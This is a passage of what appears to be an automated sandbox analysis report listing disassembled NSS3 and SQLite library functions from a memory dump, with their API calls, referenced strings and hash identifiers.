                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 183580322-336475711
                                                                                                                                                                                                                            • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                            • Instruction ID: 9f53078ce91f2ba9b4ea3797e48dbbd327ce78eaac57ac1baf4051a2b571942b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C0B29002A59BEB208AA4DD057AF77A8EF54318F150129DC24A7B00E775EA18C7F6
                                                                                                                                                                                                                            Function 6CB96C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_DigestInit), ref: 6CB96C66
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96C94
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96CA3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB96CB9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB96CD5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                            • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                            • Opcode ID: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
                                                                                                                                                                                                                            • Instruction ID: 162ca5504ab7d9d8e2f9841e825fb9a52333393fee75183b0294888c3fbb4c27
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F210170601194ABDB509B259D99F9F3BB5EB4331DF494039E809D7B12EB309A48CBE2
                                                                                                                                                                                                                            Function 6CB99DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CB99DF6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB99E24
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB99E33
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB99E49
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CB99E65
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                                                                                                                                                            • API String ID: 1003633598-1678415578
                                                                                                                                                                                                                            • Opcode ID: 777472104fc251a741f5a581ccf3e27b9b633f6f76e7fb8763f111f0ecd2b023
                                                                                                                                                                                                                            • Instruction ID: 9e340ed45d224e1df9591efef6448c62119b8191b6a82cbba5782869e1e61ffe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 777472104fc251a741f5a581ccf3e27b9b633f6f76e7fb8763f111f0ecd2b023
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B821F3B1A02184AFDB509B14DC98BAE37B4EB4370DF454035E80DA7B11EB309E4DC7A2
                                                                                                                                                                                                                            Function 6CB66DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,6CB67D8F,6CB67D8F,?,?), ref: 6CB66DC8
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CBBFE08
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CBBFE1D
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CBBFE62
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CB67D8F,?,?), ref: 6CB66DD5
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FA0,00000000,?,?,?,?,6CB67D8F,?,?), ref: 6CB66DF7
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66E35
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CBBFE29
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CBBFE3D
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CBBFE6F
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66E4C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66E82
                                                                                                                                                                                                                              • Part of subcall function 6CB66AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CB6B21D,00000000,00000000,6CB6B219,?,6CB66BFB,00000000,?,00000000,00000000,?,?,?,6CB6B21D), ref: 6CB66B01
                                                                                                                                                                                                                              • Part of subcall function 6CB66AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CB66B8A
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB66F1E
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CB66F35
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC88FE0,00000000), ref: 6CB66F6B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,6CB67D8F,?,?), ref: 6CB66FE1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 587344769-0
                                                                                                                                                                                                                            • Opcode ID: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
                                                                                                                                                                                                                            • Instruction ID: 0f0b0f7d2afeacdd5b0e0d7c777250845a884eec47d704546addd6321d862271
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb92cb0f5857d3a2b8eeb7281f3845a9d9c925e8c8722221f0c35ddb91247d78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC717071E106869FDB00CF16CD50BAABBA8FF94308F154229E858DBB11F770E994CB91
                                                                                                                                                                                                                            Function 6CBAADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
                                                                                                                                                                                                                            • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
                                                                                                                                                                                                                            • free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEF1
                                                                                                                                                                                                                            • free.MOZGLUE(6CB8CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?), ref: 6CBAAF0B
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAF30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 161582014-0
                                                                                                                                                                                                                            • Opcode ID: 1fc454fd05b38446fd4fefb5bc7d3cbeb31054ac4cedae9ce7c8df11f86ffa49
                                                                                                                                                                                                                            • Instruction ID: 9aa288bee52e652f1334a50b1e38e1b837904e38614658334264f0f47982e588
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fc454fd05b38446fd4fefb5bc7d3cbeb31054ac4cedae9ce7c8df11f86ffa49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6451BFB1A04642AFDB04DF65D884A59B7B4FF08318F144264D84897E01E732F965CFE2
                                                                                                                                                                                                                            Function 6CB84CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CB8AB7F,?,00000000,?), ref: 6CB84CB4
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CB8AB7F,?,00000000,?), ref: 6CB84CC8
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6CB8AB7F,?,00000000,?), ref: 6CB84CE0
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6CB8AB7F,?,00000000,?), ref: 6CB84CF4
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,6CB8AB7F,?,00000000,?), ref: 6CB84D03
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,00000000,?), ref: 6CB84D10
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_Now.NSS3(?,00000000,?), ref: 6CB84D26
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CB84D98
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CB84DDA
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CB84E02
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4032354334-0
                                                                                                                                                                                                                            • Opcode ID: 8ab55add7fbf30b6943a4da2ffbc971e9ce7592ad4c6031ff4c3dd9f9f68911b
                                                                                                                                                                                                                            • Instruction ID: c8d7d24f1016268060c56bfed4d3686e2d08f6222f3f5c892508d127ff335500
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ab55add7fbf30b6943a4da2ffbc971e9ce7592ad4c6031ff4c3dd9f9f68911b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7841A7B5E002559BEB119F68EC5096A77BCFF05219F054170EC1887712FB31E928CBA2
                                                                                                                                                                                                                            Function 6CB4FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CB4FD18
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CB4FD5F
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB4FD89
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CB4FD99
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CB4FE3C
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CB4FEE3
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CB4FEEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                            • String ID: simple
                                                                                                                                                                                                                            • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                            • Opcode ID: ea3b44e813ee13e2c43bc5939dc034a1ffc4cc239c767cba8528d553ec69d2ca
                                                                                                                                                                                                                            • Instruction ID: 928c59e24ebc4d95950a34cda027b0f03b3a3f0491ba0ae8be93569ec274a0c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea3b44e813ee13e2c43bc5939dc034a1ffc4cc239c767cba8528d553ec69d2ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C9191B0E05245DFDB04CF65C980AAAB7B2FF88318F24C16CD8199BB56E731E841DB91
                                                                                                                                                                                                                            Function 6CB55CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB55EC9
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB55EED
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CB55E64
                                                                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6CB55EC3
                                                                                                                                                                                                                            • invalid, xrefs: 6CB55EBE
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB55ED1
                                                                                                                                                                                                                            • misuse, xrefs: 6CB55EDB
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CB55EE0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                            • API String ID: 632333372-1982981357
                                                                                                                                                                                                                            • Opcode ID: a5d644c53aa2df1ba5db41643cb5bd9fbd142977164cda2c1f022da16b020588
                                                                                                                                                                                                                            • Instruction ID: cb755c39f1c3f2267fe77ff2ade48c56d536ad6040461ad17850393662f64881
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5d644c53aa2df1ba5db41643cb5bd9fbd142977164cda2c1f022da16b020588
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C81F432B057A19BEB09CF55D848B6A7370FF4130AF940268D8155BF90D731E86ACBDA
                                                                                                                                                                                                                            Function 6CB3DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3DDF9
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3DE68
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB3DE97
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB3DEB6
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3DF78
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 1526119172-598938438
                                                                                                                                                                                                                            • Opcode ID: d2e7d5e78d75c50c9bf52016ed16fb7ce7452a533ca1375508b2e9f959be63f1
